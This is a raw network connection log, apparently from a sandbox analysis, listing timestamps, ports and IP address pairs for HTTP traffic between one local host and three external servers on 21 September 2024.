Sep 21, 2024 14:48:10.467788935 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.467818975 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468157053 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468170881 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468199015 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468211889 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468374014 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468393087 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468404055 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468415976 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468426943 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468436956 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468439102 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468451023 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468461037 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468465090 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468482971 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468499899 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468508959 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468523026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.468533993 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468545914 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468556881 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468564034 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.468568087 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.468569994 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468583107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468594074 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468601942 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.468604088 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468616009 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468621016 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.468627930 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468636990 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.468641043 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468652010 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468667984 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468668938 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.468698025 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468887091 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468899965 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468909979 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.468923092 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468934059 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468943119 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468945980 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468957901 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468969107 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.468970060 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468982935 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.468985081 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.468985081 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.468996048 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469007015 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469019890 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469027996 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469038963 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469050884 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469053984 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469063044 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469074011 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469083071 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469085932 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469099045 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469099998 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469110966 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469121933 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469130993 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469132900 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469146013 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469152927 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469160080 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469170094 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469172001 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469185114 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469192028 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469197989 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469212055 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469218016 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469223976 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469237089 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469249010 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469252110 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469260931 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469264030 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469274044 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469276905 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469286919 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469297886 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469301939 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469310045 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469321966 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469332933 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469333887 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469347954 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469379902 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469898939 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469912052 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469922066 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469933987 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469944000 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469953060 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469955921 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469968081 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469974995 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.469980955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.469991922 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470001936 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470005035 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470016956 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470016003 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470031977 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470038891 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470048904 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470057011 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470061064 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470073938 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470086098 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470097065 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470123053 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470319986 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470333099 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470344067 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470355988 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470366955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470383883 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470385075 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470396996 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470397949 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470408916 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470421076 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470422983 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470432997 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470442057 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470444918 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470458984 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470470905 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470478058 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470489979 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470499039 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470503092 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470518112 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470520973 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470535040 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470546007 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470554113 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470556021 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470567942 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470578909 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470582008 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470593929 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470602989 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470606089 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470619917 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470622063 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470632076 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470643997 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470650911 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470657110 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470669031 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470679998 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470681906 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470693111 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470694065 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470706940 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470710993 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470721006 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470729113 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470732927 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470746040 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470757961 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470768929 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.470772028 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470787048 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.470812082 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471307039 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471319914 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471329927 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471340895 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471352100 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471359968 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471364975 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471376896 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471379042 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471395969 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471395969 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471409082 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471421003 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471426010 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471434116 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471446037 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471457005 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471456051 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471470118 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471473932 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471482992 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471503019 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471519947 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471714973 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471728086 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471739054 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471751928 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471762896 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471761942 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471776009 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471785069 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471788883 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471801996 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471812963 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471818924 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471824884 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471829891 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471834898 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471842051 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471853971 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.471864939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.471867085 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471883059 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471884966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.471899986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.471911907 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.471916914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.471930027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.471931934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.471931934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.471941948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.471955061 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.471966028 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.471971989 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.471980095 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.471991062 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.471991062 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472003937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472014904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472014904 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472028017 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472039938 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472042084 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472052097 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472060919 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472064972 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472078085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472088099 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472090006 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472101927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472114086 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472115993 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472126961 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472135067 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472137928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472151041 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472162008 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472165108 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472191095 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472203970 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472670078 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472682953 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472692966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472703934 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472719908 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472723961 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472732067 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472743034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472752094 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472754955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472768068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472768068 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472781897 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472789049 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472795010 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472806931 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472812891 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472825050 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472837925 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472841024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472850084 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.472853899 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472882986 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.472908020 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473067045 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473078966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473088980 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473100901 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473107100 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473113060 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473124981 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473126888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473140001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473150969 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473155975 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473162889 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473165989 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473175049 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473187923 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473196030 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473201036 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473220110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473220110 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473232031 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473238945 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473243952 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473254919 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473264933 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473275900 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473284006 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473287106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473303080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473314047 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473315001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473328114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473330021 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473340034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473351002 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473357916 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473364115 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473376036 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473387003 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473387003 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473402023 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473402977 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473413944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473423958 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473427057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473437071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473438978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473453045 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473464012 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473468065 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473475933 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473486900 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473494053 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.473499060 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.473510027 CEST	49712	80	192.168.2.9	103.130.147.211
